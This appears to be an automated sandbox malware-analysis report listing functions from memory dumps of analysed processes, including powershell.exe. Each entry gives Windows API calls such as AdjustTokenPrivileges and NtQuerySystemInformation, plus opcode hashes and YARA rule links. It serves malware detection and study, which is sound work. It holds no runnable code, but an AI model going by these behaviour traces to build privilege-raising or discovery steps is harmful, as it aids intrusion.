                                                        • Instruction ID: de2d245e27fd95c1e01000e37c577a3690b3bbe90a91f8b1bb058e1601d227b9
                                                        • Opcode Fuzzy Hash: ca1d538b154053717fd9514435be06c887bbd5d317c8fbf5e696b63288d1f875
                                                        • Instruction Fuzzy Hash: 1CF0CD31504740CFEB10DF06E989769FFA0EF84721F18C4AADD0D4B252D278A908EBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0057A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: fa4a67d5eb19191b919d8799d9fc811f8050352567fd72ff04e4756e129db1dd
                                                        • Instruction ID: 09c3cacbe5365e5bc4e94f37774e09d081e9f9e841fc1a9bac6086d62e67129f
                                                        • Opcode Fuzzy Hash: fa4a67d5eb19191b919d8799d9fc811f8050352567fd72ff04e4756e129db1dd
                                                        • Instruction Fuzzy Hash: 3811A3715093809FD711CF25DC45B97FFA4EF42220F0980EBED498B262D275A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0057A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0057A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: aafc5c25173b923bea0c91d0a03ea542dd8a10e8fbfc514a82492cbcd0e62bf0
                                                        • Instruction ID: 8b79437c2a8fbb15e40a93fa969a8c5153b38ad6ebe0317ecfca1e98ff42f584
                                                        • Opcode Fuzzy Hash: aafc5c25173b923bea0c91d0a03ea542dd8a10e8fbfc514a82492cbcd0e62bf0
                                                        • Instruction Fuzzy Hash: 7701DF71504640CFEB10DF25EC857AAFF94EF40320F18C4AADD098B242D275A814DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027F014C, Relevance: .8, Instructions: 846COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2163073777.00000000027F0000.00000040.00000040.sdmp, Offset: 027F0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 811f9af7a45c9fce4c503e0cb232b2a678be63abef715d24a15f9904c79e0f62
                                                        • Instruction ID: 391013dd5de106f636a94380116181bb62c29426f8146593e5faebd5f44c535f
                                                        • Opcode Fuzzy Hash: 811f9af7a45c9fce4c503e0cb232b2a678be63abef715d24a15f9904c79e0f62
                                                        • Instruction Fuzzy Hash: C0514D6640F3D14FD7638B345C646A5BFB0AE13224B1E84DBC8C4CF2A3D219595ADB63
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027F07D7, Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2163073777.00000000027F0000.00000040.00000040.sdmp, Offset: 027F0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83147658ab594e2385f4c9ef59bfb3d643516a7438e0fd3e38977c8b42349017
                                                        • Instruction ID: e60ad71559c9375ea1584b556dd802ec804cf061c0bd32bc70b73d5541c19da4
                                                        • Opcode Fuzzy Hash: 83147658ab594e2385f4c9ef59bfb3d643516a7438e0fd3e38977c8b42349017
                                                        • Instruction Fuzzy Hash: E401D6B1509380AFD7138F15DC45853FFB8EE82660749C0DBEC498B263D225A909CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027F07F7, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2163073777.00000000027F0000.00000040.00000040.sdmp, Offset: 027F0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35cdb2ec4ea57ee7b27f2e01482eb17143a42696ad4f143750f1df1c667568ae
                                                        • Instruction ID: 249bfee0bbb632424f4e0ffaedae1f54e0fe64fe022cc76886e45a54b8d44b42
                                                        • Opcode Fuzzy Hash: 35cdb2ec4ea57ee7b27f2e01482eb17143a42696ad4f143750f1df1c667568ae
                                                        • Instruction Fuzzy Hash: D001DBB25093809FD7128F05DC50863FFB8EE86670749C0AFEC498B612D225A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027F07E7, Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2163073777.00000000027F0000.00000040.00000040.sdmp, Offset: 027F0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24bc56be1c319aebd183ba82d7c6ade1543da46bd381a837e7c21083ac56b102
                                                        • Instruction ID: 6269639d0877ac487bf29c0985277af28e8189b7284e9fc51486971c81ed7886
                                                        • Opcode Fuzzy Hash: 24bc56be1c319aebd183ba82d7c6ade1543da46bd381a837e7c21083ac56b102
                                                        • Instruction Fuzzy Hash: 04F08676505740AFD7118F06EC41863FBA8EF86670704C46FED498B612D225A915CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02B00861, Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2163591156.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5147fd96355a745f66a4de18832cc8c34dd5e8fa46e4a6387cbad9756b21a8f
                                                        • Instruction ID: e04af1e4ae5ac057284fd289dc1fc6ad6586391141e8a8f9e75ab16edef0ed6f
                                                        • Opcode Fuzzy Hash: c5147fd96355a745f66a4de18832cc8c34dd5e8fa46e4a6387cbad9756b21a8f
                                                        • Instruction Fuzzy Hash: 65E0D82124D3D00FC3030214A8996EA7FB2CFC3210B0E40EBD582CF253C9488C4793A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027F081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2163073777.00000000027F0000.00000040.00000040.sdmp, Offset: 027F0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b1b9a879b9b0160f7ef737a681532645f0b8690fc44b0f6a8d7716ac77f9580
                                                        • Instruction ID: 006b82ba88af0e584d47637b5e7259d3362c7e63188215cf0fb8a4579a8cf42f
                                                        • Opcode Fuzzy Hash: 0b1b9a879b9b0160f7ef737a681532645f0b8690fc44b0f6a8d7716ac77f9580
                                                        • Instruction Fuzzy Hash: B3E09276A047008BD750DF0BEC41852F794EB84A30B18C07FDC0D8B710D135B509CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 005723F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154925005.0000000000572000.00000040.00000001.sdmp, Offset: 00572000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7120689b3380d8187a7944b3d9fbda6361d8e29fcf55fbe82334bd6fce0e18a6
                                                        • Instruction ID: 46e5e98bd20da2c405206231b44ad25d8512e1c8865575aa19e9100be996046b
                                                        • Opcode Fuzzy Hash: 7120689b3380d8187a7944b3d9fbda6361d8e29fcf55fbe82334bd6fce0e18a6
                                                        • Instruction Fuzzy Hash: 39D05E79214A818FDB168A1CD1A4B953B95BF55B04F4684F9E844CB6A3C768E981E200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 005723BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154925005.0000000000572000.00000040.00000001.sdmp, Offset: 00572000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74822b2e667635d392485145ed12f223f00c148e704bc913e4e013abf878bc3e
                                                        • Instruction ID: 70e75865883b632c42603f055768182735e63e3cfcfb9353aa5bb8207da57815
                                                        • Opcode Fuzzy Hash: 74822b2e667635d392485145ed12f223f00c148e704bc913e4e013abf878bc3e
                                                        • Instruction Fuzzy Hash: 3ED05E343006818FDB15CA1CD194F5977E4BF40700F0688ECBC008B266C3A8E880D600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2028 Parent PID: 2888 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01E9ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 52d4c7b169919889185aa6aba1118e4f37d99402e81cb1945e7d6d2441c9e324
                                                        • Instruction ID: 3f6496d40464252e4e11b00e59612c9456afc4014ace9901e1e58f036a3d4a6a
                                                        • Opcode Fuzzy Hash: 52d4c7b169919889185aa6aba1118e4f37d99402e81cb1945e7d6d2441c9e324
                                                        • Instruction Fuzzy Hash: 2821D1765097849FEB238F25DC44B92BFF4EF06314F0884EAE9858F163D231A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 6eabfedcf69284da304266b46ab709fdfce29594af986e5130cd2a0f559c679f
                                                        • Instruction ID: 36d85be3acc137ea3c48a49a7d1728dc37d3dcb5f1af2a634a61b79156efc306
                                                        • Opcode Fuzzy Hash: 6eabfedcf69284da304266b46ab709fdfce29594af986e5130cd2a0f559c679f
                                                        • Instruction Fuzzy Hash: 86115E75500704DFEF21CF55D884BAAFBE4EF44225F08C46AED498B662D731E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E9B329
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 08af9b5e276e46d05eae48c4a0b04ba54879d0f35244694bc34e437fb4f9cdc7
                                                        • Instruction ID: 65cc46fc5879c64d93375e25533262659aa841fc596fbe3164ce1c7893e83e43
                                                        • Opcode Fuzzy Hash: 08af9b5e276e46d05eae48c4a0b04ba54879d0f35244694bc34e437fb4f9cdc7
                                                        • Instruction Fuzzy Hash: 3011EC31108380AFDB22CF15DC45F62FFB0EF06224F08808AED884B663C275A818CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E9B329
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 10a36576eaa4756e18a3959d634cd379fd9e89b6381f04cde6ec146140fec034
                                                        • Instruction ID: 90e2c47c0d71d5bd6c7a535fb0f31fe0be057a61a09c07376efcdb5cce46ea90
                                                        • Opcode Fuzzy Hash: 10a36576eaa4756e18a3959d634cd379fd9e89b6381f04cde6ec146140fec034
                                                        • Instruction Fuzzy Hash: 6501AD31500704DFEF21CF09EC85B6AFBA0EF08721F08C09ADD890B612C2B1A418DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027B01D0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 8af777490ad1e7d12ac9cde6c6d3717e6e58ace6483552b40473ceebce3a7c57
                                                        • Instruction ID: ed6767562a2965304b94d9f3db835c6b3e66889ab59d0514c0b4cf144035612a
                                                        • Opcode Fuzzy Hash: 8af777490ad1e7d12ac9cde6c6d3717e6e58ace6483552b40473ceebce3a7c57
                                                        • Instruction Fuzzy Hash: A131376650E3C48FE7138B759C65792BFB4AF43210F0E84DBD884CF1A3D6299809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027B072D
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 7033cbc3edbbbd600fd7343851b07aa11d8a564f82008744fcf571b3a5be578c
                                                        • Instruction ID: d33b3a3792f376be8f63ff8eec8a2d5213bcfd2ad34ca692116628ee5f50c708
                                                        • Opcode Fuzzy Hash: 7033cbc3edbbbd600fd7343851b07aa11d8a564f82008744fcf571b3a5be578c
                                                        • Instruction Fuzzy Hash: 32316271505384AFE722CF65CC45F96FFF8EF05210F09849EE9858B692D375A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 027B0DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: f7b1eb386f25d03b43151316e903c4193eb9ff005dcd4d4d35ac3b52e06d0cb6
                                                        • Instruction ID: c441496b19c6186ee6de70e8b3b8be73714abc5cd7a5f95bb767692f08c52adc
                                                        • Opcode Fuzzy Hash: f7b1eb386f25d03b43151316e903c4193eb9ff005dcd4d4d35ac3b52e06d0cb6
                                                        • Instruction Fuzzy Hash: 15319871509384AFE712CB25DC45B96BFE8DF06214F0884AAE984CF293D375A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 49acd65a968dd720921dbd00f11f10ce3907a10dab2bb9f5b2a0e0f338cd8b1e
                                                        • Instruction ID: bb2a7d4ac20df5051288c2ae9d38439824ab957b98104b0c0049526d65a745e7
                                                        • Opcode Fuzzy Hash: 49acd65a968dd720921dbd00f11f10ce3907a10dab2bb9f5b2a0e0f338cd8b1e
                                                        • Instruction Fuzzy Hash: 7C21A7B2509780AFEB128F24DC45B96BFB8EF06310F0884DBE985DB193D2659945C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: c9440e733a9fcb1e9b4559d90fd2fad1b70b3390968775ead9c213b7338c1318
                                                        • Instruction ID: 7cb1eb0296da25268591e26ea1f5099569d03a07a56885a2b73ec1b04ef7dcd5
                                                        • Opcode Fuzzy Hash: c9440e733a9fcb1e9b4559d90fd2fad1b70b3390968775ead9c213b7338c1318
                                                        • Instruction Fuzzy Hash: 64318471509384AFE712CB61DC55F96BFB8EF06210F08859BF985DB193D225A908C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027B109E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 7b33eea538b2524560d6e853736f6b15a7ddcfdfc6c3e8920b7201149b29a82e
                                                        • Instruction ID: b079c2e9071ebff6542ea2d47c74b19dcd70df686f47d0be1a300e0cb2862e79
                                                        • Opcode Fuzzy Hash: 7b33eea538b2524560d6e853736f6b15a7ddcfdfc6c3e8920b7201149b29a82e
                                                        • Instruction Fuzzy Hash: 2F31717550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D629A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 4114cf23e6bfac5be0027e08e4eb58d23f81f997d1ac6666e7093469d0c86e4d
                                                        • Instruction ID: 6ef303b934222c5a7959f0a57c3ad4a9773d6dfe3bfe4c92dbd96edab4aaca57
                                                        • Opcode Fuzzy Hash: 4114cf23e6bfac5be0027e08e4eb58d23f81f997d1ac6666e7093469d0c86e4d
                                                        • Instruction Fuzzy Hash: D221B171509384EFEB22CF15DC44FA6BFA8EF02320F08849BE945CB192D664A948CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: 755183679df95da379fd15501c22a51c3a314239d27884d121dcc65aca025400
                                                        • Instruction ID: c54e00368b96993deaed7e8beed3043d6db2b6e77fb223a15a0a3f2949b84741
                                                        • Opcode Fuzzy Hash: 755183679df95da379fd15501c22a51c3a314239d27884d121dcc65aca025400
                                                        • Instruction Fuzzy Hash: A221B77184D3C15FD312CB658C55B66BFB4EF47620F0981DBD8848F193D229A919CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B0819
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: be43a83b31c61b6be26dba4c0f9ab627a5d271681ebccfaa4149182f0595168a
                                                        • Instruction ID: 6702d95aad657db15fb8507e38b2dce2e019bc4ccf16711057eb5b780f991d89
                                                        • Opcode Fuzzy Hash: be43a83b31c61b6be26dba4c0f9ab627a5d271681ebccfaa4149182f0595168a
                                                        • Instruction Fuzzy Hash: 3F21D7B6408784AFE712CB159C45FA7BFA8EF46720F0981DBF9858B193D224A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027B0502
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 925c908959323deb5ece9f1367ff101809b10a2a3a4035518ed8eafaa7461666
                                                        • Instruction ID: 56e65949d2e4f81ecb560e72061f8bf5f1121c1b6e5d969b3e7f1318287b7f52
                                                        • Opcode Fuzzy Hash: 925c908959323deb5ece9f1367ff101809b10a2a3a4035518ed8eafaa7461666
                                                        • Instruction Fuzzy Hash: 0B217F7540E7C0AFD3128B758C55B62BFB4EF87610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027B072D
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 5cc42c95d3a3c619f0ce67fd1525045c1d246b72908aa1096cd80d9633dd1f15
                                                        • Instruction ID: 5b043dd3957ba42d8c07efe3f4f49202b740d1d41e2fa220e99522dbcfb2ac10
                                                        • Opcode Fuzzy Hash: 5cc42c95d3a3c619f0ce67fd1525045c1d246b72908aa1096cd80d9633dd1f15
                                                        • Instruction Fuzzy Hash: A8219071500704EFEB21DF65CC85FA7FBE8EF08650F04846AE9899B692D771E904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B08E5
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 83524353c9ee8f7af71379293b478abdb0afa80b769c1d95deaf68908e603311
                                                        • Instruction ID: 81a41f1959e25596b82afe1339df25073f90b48ef0fcabecc5ba131f253aa80b
                                                        • Opcode Fuzzy Hash: 83524353c9ee8f7af71379293b478abdb0afa80b769c1d95deaf68908e603311
                                                        • Instruction Fuzzy Hash: 56219271409380AFE722CF61DC45F96BFB8EF46314F09849BE9849B193C265A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 143f87e9cd8cbf7f574d0ece6377b39f082690352da39f11b3d8ce03a2c16ba1
                                                        • Instruction ID: c68b3487031f36835b1b6f180647d99424e48bd8fc01222d383f4a75f5e2d85e
                                                        • Opcode Fuzzy Hash: 143f87e9cd8cbf7f574d0ece6377b39f082690352da39f11b3d8ce03a2c16ba1
                                                        • Instruction Fuzzy Hash: 15219575409780AFD3138B259C51B62BFB4EF87610F0981DBE8848B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 027B0DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: c1b032d1945ed8c9b05429eb59b403e259e3a08cc460934fddd7387a1bdcc09f
                                                        • Instruction ID: d8d3cae8af487eeb13837a3603368f4de89e09f43c8c4121f6bbcdf953f68213
                                                        • Opcode Fuzzy Hash: c1b032d1945ed8c9b05429eb59b403e259e3a08cc460934fddd7387a1bdcc09f
                                                        • Instruction Fuzzy Hash: D0218E71600244AFF721DF65DC85BA7FBD8EF04614F0484AAED48DB282D775F904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 956665bc52ec8df03c54198c231edae6913a4c46533095678a7dce5f1fee3019
                                                        • Instruction ID: a4f5644c760c8d8017cdbba1066bb7c0c2c7858ac28a0becb35a55306945bedb
                                                        • Opcode Fuzzy Hash: 956665bc52ec8df03c54198c231edae6913a4c46533095678a7dce5f1fee3019
                                                        • Instruction Fuzzy Hash: 19119D72500704EFEB21CF55DC85FAAFBECEF04320F04856AF9459A141D670A9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: b79437eafb8aed5f86afbc150bb8162a1c361454de448e8d46e3eb4e0a456e32
                                                        • Instruction ID: 71d76aa979ba8f339c9c76b32feb7531312b5a2afc531efbe66b8337d492ca42
                                                        • Opcode Fuzzy Hash: b79437eafb8aed5f86afbc150bb8162a1c361454de448e8d46e3eb4e0a456e32
                                                        • Instruction Fuzzy Hash: FD118171600704EFEB21CF15DC85FAAFBE8EF44760F14846AED05CB281D674E9448A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
